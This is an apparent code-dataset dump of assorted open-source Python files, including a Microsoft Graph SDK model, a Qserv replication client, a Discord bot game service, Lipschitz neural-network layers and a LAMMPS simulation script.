Currently, only ProfileVersion1 is supported.\n profile_identifier: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> FileEncryptionInfo:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: FileEncryptionInfo\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return FileEncryptionInfo()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"encryptionKey\": lambda n : setattr(self, 'encryption_key', n.get_bytes_value()),\n \"fileDigest\": lambda n : setattr(self, 'file_digest', n.get_bytes_value()),\n \"fileDigestAlgorithm\": lambda n : setattr(self, 'file_digest_algorithm', n.get_str_value()),\n \"initializationVector\": lambda n : setattr(self, 'initialization_vector', n.get_bytes_value()),\n \"mac\": lambda n : setattr(self, 'mac', n.get_bytes_value()),\n \"macKey\": lambda n : setattr(self, 'mac_key', n.get_bytes_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"profileIdentifier\": lambda n : setattr(self, 'profile_identifier', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_bytes_value(\"encryptionKey\", self.encryption_key)\n writer.write_bytes_value(\"fileDigest\", self.file_digest)\n writer.write_str_value(\"fileDigestAlgorithm\", self.file_digest_algorithm)\n writer.write_bytes_value(\"initializationVector\", self.initialization_vector)\n writer.write_bytes_value(\"mac\", self.mac)\n writer.write_bytes_value(\"macKey\", self.mac_key)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_str_value(\"profileIdentifier\", self.profile_identifier)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/file_encryption_info.py","file_name":"file_encryption_info.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"34720681201","text":"import pandas as pd\nfrom sklearn import datasets\n\n\ndef get():\n \"\"\"Get training data\"\"\"\n d = datasets.load_iris()\n df = pd.DataFrame(d[\"data\"])\n\n df.columns = d[\"feature_names\"]\n df[\"target\"] = d[\"target\"]\n return df\n","repo_name":"ploomber/soopervisor","sub_path":"tests/assets/my_project/src/my_project/tasks/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"13175462451","text":"from graphcast.graphcast import ModelConfig, TaskConfig, GraphCast\nfrom fmbase.util.config import cfg\ndef config_model( **kwargs ) -> ModelConfig:\n\tmc = ModelConfig()\n\tmc.resolution= kwargs.get('resolution', cfg().model.resolution),\n\tmc.mesh_size= kwargs.get('mesh_size', cfg().model.mesh_size),\n\tmc.latent_size= kwargs.get('latent_size', 
cfg().model.latent_size),\n\tmc.gnn_msg_steps= kwargs.get('gnn_msg_steps', cfg().model.gnn_msg_steps),\n\tmc.hidden_layers= kwargs.get('hidden_layers', cfg().model.hidden_layers),\n\tmc.radius_query_fraction_edge_length= kwargs.get('radius_query_fraction_edge_length', cfg().model.radius_query_fraction_edge_length)\n\treturn mc\n\ndef config_task( **kwargs) -> TaskConfig:\n\tdts = cfg().task.data_timestep\n\ttc = TaskConfig()\n\ttc.input_variables= kwargs.get('input_variables', cfg().task.input_variables)\n\ttc.target_variables= kwargs.get('target_variables', cfg().task.target_variables)\n\ttc.forcing_variables= kwargs.get('forcing_variables', cfg().task.forcing_variables)\n\ttc.pressure_levels= kwargs.get('z_levels', cfg().task.z_levels)\n\ttc.input_duration= kwargs.get('input_duration', f\"{cfg().task.input_steps*dts}h\" )\n\treturn tc","repo_name":"nasa-nccs-hpda/FMGraphcast","sub_path":"fmgraphcast/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19305383343","text":"import logging\nimport posixpath\nimport socket\nimport sys\nimport urllib.parse\n\n# -------------------------------\n# Imports of standard modules --\n# -------------------------------\nfrom functools import lru_cache\nfrom typing import Any, Dict, List, Tuple\n\n# ----------------------------\n# Imports for other modules --\n# ----------------------------\nfrom . import jsonparser, util, version\nfrom .exception import IngestError\nfrom .http import DEFAULT_AUTH_PATH, Http, get_fqdn\nfrom .ingestconfig import IngestServiceConfig\n\n# ---------------------------------\n# Local non-exported definitions --\n# ---------------------------------\n\n\n_LOG = logging.getLogger(__name__)\n\n\nclass ReplicationClient:\n \"\"\"Client for the Qserv ingest/replication service.\n Use chunk metadata and connection to concurrent queue manager\n \"\"\"\n\n def __init__(\n self, repl_url: str, timeout_read_sec: int, timeout_write_sec: int, auth_path: str = DEFAULT_AUTH_PATH\n ) -> None:\n\n self.repl_url = util.trailing_slash(repl_url)\n self.http = Http(timeout_read_sec, timeout_write_sec, auth_path)\n self._check_version()\n self.index_url = urllib.parse.urljoin(self.repl_url, \"replication/sql/index\")\n\n def abort_all_transactions(self, database: str) -> None:\n \"\"\"Abort all started transactions for a given database.\"\"\"\n for transaction_id in self.get_transactions_inprogress(database):\n success = False\n self.close_transaction(database, transaction_id, success)\n _LOG.info(\"Abort transaction: %s\", transaction_id)\n\n def build_secondary_index(self, database: str) -> None:\n url = urllib.parse.urljoin(self.repl_url, \"ingest/index/secondary\")\n _LOG.info(\"Create secondary index\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"allow_for_published\": 1,\n \"local\": 1,\n \"rebuild\": 1,\n }\n self.http.post(url, payload)\n\n def close_transaction(self, database: str, transaction_id: int, success: bool) -> None:\n \"\"\"Close or abort a transaction.\"\"\"\n tmp_url = posixpath.join(\"ingest/trans/\", str(transaction_id))\n if success is True:\n tmp_url += \"?abort=0\"\n else:\n tmp_url += \"?abort=1\"\n url = urllib.parse.urljoin(self.repl_url, tmp_url)\n _LOG.debug(\"Attempt to close transaction (PUT %s)\", url)\n responseJson = self.http.put(url, payload=None, no_readtimeout=True)\n\n # TODO Check if there is only one transaction in responseJson 
in\n # order to remove 'database' parameter\n for trans in responseJson[\"databases\"][database][\"transactions\"]:\n _LOG.debug(\"Close transaction (id: %s state: %s)\", trans[\"id\"], trans[\"state\"])\n\n def _check_version(self) -> None:\n \"\"\"Check replication service version and exit if it is not\n the expected one\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"meta/version\")\n responseJson = self.http.get(url)\n if responseJson[\"version\"] != version.REPL_SERVICE_VERSION:\n _LOG.critical(\n \"Invalid replication server version (is %s, expected %s)\",\n responseJson[\"version\"],\n version.REPL_SERVICE_VERSION,\n )\n sys.exit(1)\n _LOG.info(\"Replication service version: v%s\", version.REPL_SERVICE_VERSION)\n\n def database_config(self, database: str, ingest_service_config: IngestServiceConfig) -> None:\n \"\"\"Set replication system configuration for a given database https://co\n nfluence.lsstcorp.org/display/DM/Ingest%3A+11.1.8.1.+Setting+configurat\n ion+parameters.\n\n Parameters\n ----------\n database: `str`\n Database name\n replication_config: `util.IngestServiceConfig`\n Configuration parameters for the database inside\n replication/ingest system\n\n \"\"\"\n json = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"CAINFO\": ingest_service_config.cainfo,\n \"SSL_VERIFYPEER\": ingest_service_config.ssl_verifypeer,\n }\n\n if ingest_service_config.async_proc_limit is not None:\n json[\"ASYNC_PROC_LIMIT\"] = ingest_service_config.async_proc_limit\n if ingest_service_config.async_proc_limit is not None:\n json[\"LOW_SPEED_LIMIT\"] = ingest_service_config.low_speed_limit\n if ingest_service_config.async_proc_limit is not None:\n json[\"LOW_SPEED_TIME\"] = ingest_service_config.low_speed_time\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/config/\")\n _LOG.debug(\"Configure database inside replication system, url: %s, json: %s\", url, json)\n self.http.put(url, json)\n\n def database_publish(self, database: str) -> None:\n \"\"\"Publish a database inside replication system.\"\"\"\n path = \"/ingest/database/{}\".format(database)\n url = urllib.parse.urljoin(self.repl_url, path)\n _LOG.debug(\"Publish database: %s\", url)\n self.http.put(url, no_readtimeout=True)\n\n def database_register(self, json_db: Dict) -> None:\n \"\"\"Register a database inside replication system using\n data_url/.json as input data.\"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/database/\")\n payload = json_db\n _LOG.debug(\"Starting a database registration request: %s with %s\", url, payload)\n self.http.post_retry(url, payload)\n\n def database_register_tables(self, tables_json_data: List[Dict], felis: Dict = None) -> None:\n \"\"\"Register a database inside replication system using\n data_url/.json as input data.\"\"\"\n if felis is not None:\n _LOG.info(\"Load Felis schema for tables %s\", felis.keys())\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/table/\")\n\n if _LOG.isEnabledFor(logging.DEBUG):\n _LOG.debug(\"Ordered list of table to register\")\n for json_data in tables_json_data:\n _LOG.debug(\" %s\", json_data[\"table\"])\n\n for json_data in tables_json_data:\n if felis is not None and json_data[\"table\"] in felis:\n schema = felis[json_data[\"table\"]]\n json_data[\"schema\"] = schema + json_data[\"schema\"]\n _LOG.debug(\"Start a table registration request: %s with %s\", url, json_data)\n self.http.post_retry(url, json_data)\n\n def get_database_status(self, database: str, family: str) -> jsonparser.DatabaseStatus:\n url 
= urllib.parse.urljoin(self.repl_url, \"replication/config\")\n responseJson = self.http.get(url)\n status = jsonparser.parse_database_status(responseJson, database, family)\n _LOG.debug(f\"Database {family}:{database} status: {status}\")\n return status\n\n # FIXME this might use a lot of memory\n @lru_cache(maxsize=128)\n def get_chunk_location(self, chunk_id: int, database: str) -> Tuple[str, int]:\n \"\"\"Get the location of a chunk for a given database.\n\n Parameters\n ----------\n chunk : `str`\n Chunk id.\n database : `str`\n Database name.\n\n Returns\n -------\n x : `str`\n Hostname of the qserv worker which store the chunk\n y : `int`\n Port number of the of replication service on\n the qserv worker which store the chunk\n\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/chunk\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"chunk\": chunk_id,\n \"database\": database,\n }\n responseJson = Http().post_retry(url, payload)\n\n fqdns, port = jsonparser.get_chunk_location(responseJson)\n host = get_fqdn(fqdns, port)\n if not host:\n raise IngestError(f\"Unable to find a valid worker fqdn in json response {responseJson}\")\n _LOG.info(\"Location for chunk %d: %s:%d\", chunk_id, host, port)\n\n return (host, port)\n\n @lru_cache(maxsize=1)\n def get_regular_tables_locations(self, database: str) -> List[Tuple[str, int]]:\n \"\"\"Returns connection parameters of the Data Ingest Service of workers\n which are available for ingesting regular (fully replicated) tables.\n\n Parameters\n ----------\n database : `str`\n Database name.\n\n Returns\n -------\n x : `str`\n Hostname of the qserv worker which store the chunk\n y : `int`\n Port number of the of replication service on\n the qserv worker which store the chunk\n\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/regular\")\n payload = {\"database\": database}\n responseJson = Http().get(url, payload)\n\n sanitized_locations: List[Tuple[str, int]] = []\n locations = jsonparser.get_regular_table_locations(responseJson)\n for (fqdns, port) in locations:\n fqdn = get_fqdn(fqdns, port)\n if not fqdn:\n raise IngestError(f\"Unable to find a valid worker fqdn in json response {responseJson}\")\n sanitized_locations.append((fqdn, port))\n\n _LOG.info(\"Locations for regular tables for database %s: %s\", database, locations)\n\n return sanitized_locations\n\n def _get_transactions(self, states: List[jsonparser.TransactionState], database: str) -> List[int]:\n \"\"\"Return transactions ids.\"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/trans?database=\" + database)\n responseJson = self.http.get(url)\n transaction_ids = jsonparser.filter_transactions(responseJson, database, states)\n\n return transaction_ids\n\n def get_transactions_inprogress(self, database: str) -> List[int]:\n \"\"\"Get transaction in progress (i.e. 
not in FINISHED, ABORTED state)\n for a given database\n\n Parameters\n ----------\n database : str\n target database\n\n Returns\n -------\n List[int]\n List of transactions\n \"\"\"\n\n states = [\n jsonparser.TransactionState.ABORT_FAILED,\n jsonparser.TransactionState.FINISH_FAILED,\n jsonparser.TransactionState.IS_ABORTING,\n jsonparser.TransactionState.IS_FINISHING,\n jsonparser.TransactionState.IS_STARTING,\n jsonparser.TransactionState.STARTED,\n jsonparser.TransactionState.START_FAILED,\n ]\n trans = self._get_transactions(states, database)\n _LOG.debug(f\"IDs of transactions not in FINISHED, ABORTED state: {trans} for {database} database.\")\n return trans\n\n def index_all_tables(self, json_indexes: List[Dict[str, Any]]) -> None:\n for json_idx in json_indexes:\n _LOG.info(f\"Create index: {json_idx}\")\n self.http.post(self.index_url, json_idx)\n\n def start_transaction(self, database: str) -> int:\n url = urllib.parse.urljoin(self.repl_url, \"ingest/trans\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"context\": {\"pod\": socket.gethostname()},\n }\n responseJson = self.http.post_retry(url, payload)\n\n # For catching the super transaction ID\n # Want to print\n # responseJson[\"databases\"][][\"transactions\"]\n current_db = responseJson[\"databases\"][database]\n transaction_id = int(current_db[\"transactions\"][0][\"id\"])\n _LOG.debug(\"transaction ID: %i\", transaction_id)\n return transaction_id\n\n def deploy_statistics(self, database: str, table_names: List[str]) -> None:\n \"\"\"Collect row counters in the specified tables and deploy the\n statistics in Qserv to allow optimizations of the relevant queries.\n See:\n - https://confluence.lsstcorp.org/display/DM/3.+Managing+statistics+for+the+row+counters+optimizations # noqa: W505, E501\n - https://confluence.lsstcorp.org/display/DM/1.+Collecting+row+counters+and+deploying+them+at+Qserv\n\n Parameters\n ----------\n database : `str`\n Database name.\n table_names: `str`\n Names of processed tables\n\n Raises\n ------\n ReplicationControllerError\n Raised in case of error in JSON response\n for a non-retriable request\n \"\"\"\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/table-stats/\")\n\n # TODO Check parameters with Igor\n payload = {\n \"database\": database,\n \"overlap_selector\": \"CHUNK_AND_OVERLAP\",\n \"force_rescan\": 1,\n \"row_counters_state_update_policy\": \"ENABLED\",\n \"row_counters_deploy_at_qserv\": 1,\n }\n\n for table in table_names:\n _LOG.debug(\"Start a table statistics deployment request: %s with %s\", url, table)\n payload[\"table\"] = table\n self.http.post_retry(url, payload, auth=True, no_readtimeout=True)\n","repo_name":"lsst-dm/qserv-ingest","sub_path":"rootfs/ingest/python/qserv/replicationclient.py","file_name":"replicationclient.py","file_ext":"py","file_size_in_byte":13078,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23183841420","text":"from discord import ApplicationContext, Interaction, Message, InteractionResponse\nfrom discord.ui import View\n\nfrom embeds.boss_event.battle_embed import BattleEmbed\nfrom embeds.boss_event.hero_embed import HeroStatsEmbed\nfrom embeds.boss_event.hit_embed import HitEmbed\nfrom embeds.boss_event.inventory_embed import HeroInventoryEmbed\nfrom embeds.def_embed import DefaultEmbed\nfrom embeds.view.buttons import buttons\nfrom embeds.view.fight_view import FightView\nfrom embeds.view.inventory_view import InventoryView\nfrom 
embeds.view.profile_view import ProfileView\nfrom systems.boss_event_system.battle_system import battle_system\nfrom systems.boss_event_system.hero_system import hero_system\n\n\nclass GameService:\n def __init__(self, client):\n self.client = client\n\n async def boss(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n battle = battle_system.get_current_battle()\n\n async def attack_callback(interact: Interaction):\n fight_view.disable_attack(battle.is_over())\n await self.attack_enemy(interact, ctx)\n\n async def profile_callback(interact: Interaction):\n await self.profile(interact, ctx)\n\n fight_view = FightView(attack_callback, profile_callback)\n fight_view.disable_attack(battle.is_over())\n\n if interaction.message is None:\n await interaction.response.send_message(embed=BattleEmbed(battle, interaction.user.id),\n view=fight_view, ephemeral=True)\n else:\n await interaction.response.edit_message(embed=BattleEmbed(battle, interaction.user.id),\n view=fight_view)\n\n async def profile(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n\n async def inventory_callback(interact: Interaction):\n await self.inventory(interact, ctx) # inventory command update view by yourself\n\n async def back_callback(interact: Interaction):\n await self.boss(interact, ctx)\n\n profile_view = ProfileView(back_callback, inventory_callback)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroStatsEmbed(hero), view=profile_view, ephemeral=True)\n else:\n print(interaction.message.to_message_reference_dict())\n await interaction.response.edit_message(embed=HeroStatsEmbed(hero), view=profile_view)\n\n async def inventory(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n inventory = hero.inventory\n\n index = len(inventory.items) if index < 1 else 1 if index > len(inventory.items) else index\n\n async def back_callback(interact: Interaction):\n await self.profile(interact, ctx)\n\n async def up_callback(interact: Interaction):\n await self.inventory(interact, ctx, index - 1)\n\n async def down_callback(interact: Interaction):\n await self.inventory(interact, ctx, index + 1)\n\n async def equip_callback(interact: Interaction):\n await self.equip(interact, ctx, index)\n\n async def remove_item_callback(interact: Interaction):\n await self.remove_item(interact, ctx, index)\n\n inventory_view = InventoryView(back_callback, up_callback, down_callback, equip_callback, remove_item_callback)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index),\n view=inventory_view, ephemeral=True)\n else:\n await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index),\n view=inventory_view)\n\n async def attack_enemy(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n if hero.is_dead():\n # todo create better embed for displaying dead hero\n await interaction.response.send_message(embed=DefaultEmbed(f'***```You cant attack being dead !!!```***'),\n delete_after=3,\n 
ephemeral=True)\n            return\n\n        battle = battle_system.get_current_battle()\n\n        if not battle.fight_with(hero):\n            await interaction.response.send_message(embed=DefaultEmbed(description=\"***```Boss already dead```***\"),\n                                                    delete_after=3,\n                                                    ephemeral=True)\n            return\n\n        battle_system.update_current_battle(battle)\n        hero_system.health_change(hero)\n\n        if interaction.message is None:\n            await interaction.channel.send(embed=HitEmbed(battle, hero))\n        else:\n            await interaction.response.edit_message(embed=HitEmbed(battle, hero))\n\n        await self.boss(interaction, ctx)\n\n    async def equip(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n        if ctx is None:\n            ctx = await self.client.get_application_context(interaction)\n\n        hero = hero_system.get_hero_by_user(ctx.user)\n        item_by_index = hero.inventory.item_by_index(index)\n\n        if item_by_index is not None:\n            hero.inventory.equip(item_by_index)\n            hero_system.modify_inventory(hero)\n\n        if interaction.message is None:\n            await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index), ephemeral=True)\n        else:\n            await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index))\n\n    async def remove_item(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n        if ctx is None:\n            ctx = await self.client.get_application_context(interaction)\n\n        hero = hero_system.get_hero_by_user(ctx.user)\n\n        hero.inventory.remove_item(index)\n        hero_system.modify_inventory(hero)\n\n        if interaction.message is None:\n            await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index), ephemeral=True)\n        else:\n            await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index))\n","repo_name":"BladeXses21/DesireBot_v4","sub_path":"main/src/game_event/service/game_service.py","file_name":"game_service.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"35281941715","text":"import random\nfrom utils import *\nfrom config import *\n\n\ndef main():\n    object_list = get_questions_from_url(QUESTIONS_PATH)\n    questions = create_questions_list(object_list)\n\n    if questions[0] == \"Error\":\n        print(\"Error retrieving data! Contact the developer!\")
\n        return\n\n    count_questions = len(questions) - 1\n    answered_questions = 0\n\n    print(\"The game begins!\")\n    print()\n\n    while answered_questions <= count_questions:\n        question = questions[random.randint(0, count_questions)]\n\n        if question.answered:\n            continue\n\n        print(question.build_question())\n\n        question.user_answer = input()\n\n        print(question.build_feedback())\n\n        question.answered = not question.answered\n\n        answered_questions += 1\n\n    print_stats(questions)\n\n\nmain()\n","repo_name":"andrei1998Front/python_course","sub_path":"1_course/homework_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"30753716761","text":"\"\"\"\nAlmost Orthogonal Lipschitz (AOL) layer.\nProposed in https://arxiv.org/abs/2208.03160\nCode adapted from\n\"1-Lipschitz Layers Compared: Memory, Speed, and Certifiable Robustness\", 2023.\n\"\"\"\n\nfrom typing import Optional, Callable, Union\n\nfrom torch import nn, Tensor\nimport torch\nfrom torch.nn.common_types import _size_2_t\nfrom torch.nn.utils.parametrize import register_parametrization\n\n\ndef aol_conv2d_rescaling(weight: Tensor) -> Tensor:\n    \"\"\" Expected weight shape: out_channels x in_channels x ks1 x ks_2 \"\"\"\n    _, _, k1, k2 = weight.shape\n    weight_tp = weight.transpose(0, 1)\n    v = torch.nn.functional.conv2d(\n        weight_tp, weight_tp, padding=(k1 - 1, k2 - 1))\n    v_scaled = v.abs().sum(dim=(1, 2, 3), keepdim=True).transpose(0, 1)\n    return weight / (v_scaled + 1e-6).sqrt()\n\n\ndef aol_linear_rescaling(weight: Tensor) -> Tensor:  # shape: out x in\n    wwt = torch.matmul(weight.transpose(0, 1), weight)  # shape: in x in\n    ls_bounds_squared = wwt.abs().sum(dim=0, keepdim=True)  # shape: 1 x in\n    return weight / (ls_bounds_squared + 1e-6).sqrt()  # shape: out x in\n\n\nclass AOLConv2dRescaling(nn.Module):\n    def forward(self, weight: Tensor) -> Tensor:\n        return aol_conv2d_rescaling(weight)\n\n\nclass AOLLinearRescaling(nn.Module):\n    def forward(self, weight: Tensor) -> Tensor:\n        return aol_linear_rescaling(weight)\n\n\nclass AOLConv2d(nn.Conv2d):\n    def __init__(self,\n                 in_channels: int,\n                 out_channels: int,\n                 kernel_size: _size_2_t,\n                 initializer: Optional[Callable] = None,\n                 padding: Union[_size_2_t, str] = 'same',\n                 padding_mode: str = 'circular',\n                 **kwargs) -> None:\n        super().__init__(in_channels, out_channels, kernel_size,\n                         padding=padding, padding_mode=padding_mode, **kwargs)\n\n        if initializer is None:\n            initializer = nn.init.dirac_\n        initializer(self.weight)\n\n        torch.nn.init.zeros_(self.bias)\n\n        register_parametrization(self, 'weight', AOLConv2dRescaling())\n\n\nclass AOLConv2dOrthogonal(AOLConv2d):\n    \"\"\" Alias for AOLConv2d with orthogonal initialization. \"\"\"\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args,\n                         initializer=torch.nn.init.orthogonal_,\n                         **kwargs)\n\n\nclass AOLLinear(nn.Linear):\n    def __init__(self,\n                 in_features: int,\n                 out_features: int,\n                 initializer: Optional[Callable] = None,\n                 **kwargs) -> None:\n        super().__init__(in_features, out_features, **kwargs)\n\n        if initializer is None:\n            initializer = nn.init.eye_\n        initializer(self.weight)\n\n        torch.nn.init.zeros_(self.bias)\n\n        register_parametrization(self, 'weight', AOLLinearRescaling())\n\n\nclass AOLLinearOrthogonal(AOLLinear):\n    \"\"\" Alias for AOLLinear with orthogonal initialization.
\"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args,\n initializer=torch.nn.init.orthogonal_,\n **kwargs)\n","repo_name":"berndprach/NActivation","sub_path":"src/models/layers/lipschitz/aol.py","file_name":"aol.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39108918549","text":"a = [1, 56, 58, 57, 90, 92, 94, 93, 91, 45]\n\ndef sort_array(a):\n for i in range(0,len(a)):\n for j in range(i+1,len(a)):\n if a[i] > a[j]:\n a[i],a[j] = a[j],a[i]\n return(a)\n\ndef sub_array(a,start):\n count = 1\n i = 0\n for i in range(start,len(a)):\n if (i + 1) < len(a) and a[i+1] == a[i] + 1 :\n count += 1\n else :\n break\n return(i, count)\n\ndef largest_contagious(a):\n a = sort_array(a)\n\n # print (\"sorted array - \" + str(a))\n largest_count = 1\n j = -1\n i = 0\n while j+1 < len(a):\n i = j + 1\n # print(\"count starting at position - \" + str(i))\n j,count = sub_array(a,i)\n # print(\"count ending at position - \" + str(j))\n\n if count > largest_count:\n largest_count = count\n # print(\"largest contagious subarray length - \" + str(largest_count))\n print(\"final largest count - \" + str(largest_count))\n\nlargest_contagious(a)","repo_name":"subiditachaki/Learning_Projects","sub_path":"Learning_Python/Strings/largest contagious subarray.py","file_name":"largest contagious subarray.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28203647791","text":"#!/usr/bin/env python3\n\nimport sys\nimport numpy as np\nfrom pwtools import io, mpl, common, crys\n\nnpt_txt = \"\"\"\nfix fix_npt all npt temp 3000 3000 0.01 tri 0 0 0.3 tchain 4 pchain 4 &\n mtk yes scaleyz no scalexz no scalexy no flip no\n\"\"\"\n\nnvt_txt = \"\"\"\nfix fix_nvt all nvt temp 3000 3000 0.01 tchain 4 &\n mtk yes scaleyz no scalexz no scalexy no flip no\n\"\"\"\n\nlmp_in_templ = \"\"\"\nclear\nunits metal\nboundary p p p\natom_style atomic\n\nread_data lmp.struct\n\n### interactions\npair_style tersoff\npair_coeff * * AlN.tersoff Al N\n\n### IO\ndump dump_txt all custom 1 lmp.out.dump id type xu yu zu fx fy fz &\n vx vy vz xsu ysu zsu\n##dump dump_xyz all xyz 1 lmp.out.xyz\n##dump_modify dump_xyz element Al N\ndump dump_dcd all dcd 1 lmp.out.dcd\ndump_modify dump_txt sort id\ndump_modify dump_dcd sort id unwrap yes\nthermo_style custom step temp vol cella cellb cellc cellalpha cellbeta cellgamma &\n ke pe etotal &\n press pxx pyy pzz pxy pxz pyz cpu\nthermo_modify flush yes\nthermo 1\n\n### init\nvelocity all create 300.0 123 rot yes dist gaussian\n\n# run\n{ensemble}\ntimestep 0.5e-3\nrun 1000\n\"\"\"\n\nassert len(sys.argv) == 2, \"need one input arg: nvt or npt\"\nif sys.argv[1] == 'npt':\n ens_txt = npt_txt\nelif sys.argv[1] == 'nvt':\n ens_txt = nvt_txt\nelse:\n raise Exception(\"only nvt / npt allowed\")\n\n# create structure file\nst = crys.Structure(coords_frac=np.array([[0.0]*3, [.5]*3]),\n cryst_const=np.array([2.85]*3 + [60]*3),\n symbols=['Al','N'])\nio.write_lammps('lmp.struct', crys.scell(st,(3,3,3)))\n\n# write lmp.in for nvt or npt\ncommon.file_write('lmp.in', lmp_in_templ.format(ensemble=ens_txt))\n\n# run lammps\ncommon.system(\"mpirun -np 2 lmp < lmp.in\", wait=True)\n\n# read trajectory\ntrtxt_orig = io.read_lammps_md_txt('log.lammps')\ntrdcd = io.read_lammps_md_dcd('log.lammps')\n\n# plotting\nplots = mpl.prepare_plots(['coords', 'coords_frac', 'velocity',\n 'cryst_const', 
'cell'])\nfor name,pl in plots.items():\n trtxt = trtxt_orig.copy()\n print(name)\n xtxt = getattr(trtxt, name)\n setattr(trtxt, name, None)\n xcalc = eval('trtxt.get_%s()' %name)\n if name == 'cell':\n sl = np.s_[Ellipsis]\n func = lambda x: np.reshape(x, (x.shape[0], 9))\n elif name in trtxt.attrs_nstep_3d:\n # coords_frac and coords: only x-coord (index=0)\n sl = np.s_[Ellipsis,0]\n func = lambda x: x\n else:\n sl = np.s_[Ellipsis]\n func = lambda x: x\n lt = pl.ax.plot(func(xtxt[sl]),'b')\n lc = pl.ax.plot(func(xcalc[sl]),'r')\n ld = pl.ax.plot(func(getattr(trdcd, name)[sl]),'g')\n pl.ax.set_title(name)\n pl.ax.legend((lt[0],lc[0],ld[0]), ('txt', 'calc', 'dcd'))\n\nmpl.plt.show()\n\n","repo_name":"elcorto/pwtools","sub_path":"examples/lammps/md_nvt_npt/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"70419109586","text":"import numpy as np\nimport yaml\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n CONFIG = 'config.yaml'\n with open(CONFIG) as f:\n path = yaml.load(f)\n J1_PATH = path['robotCalibration'] + 'goal/j1.yaml'\n \n with open(J1_PATH) as f:\n J1p = yaml.load(f)\n \n J1v = np.gradient(J1p)\n plt.figure()\n plt.plot(J1p, 'r.')\n plt.figure()\n plt.plot(J1v)\n plt.show()","repo_name":"casiarobot/denso_robot_ros","sub_path":"calibration_flow/scripts/0_robotCalibration/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8686796720","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the 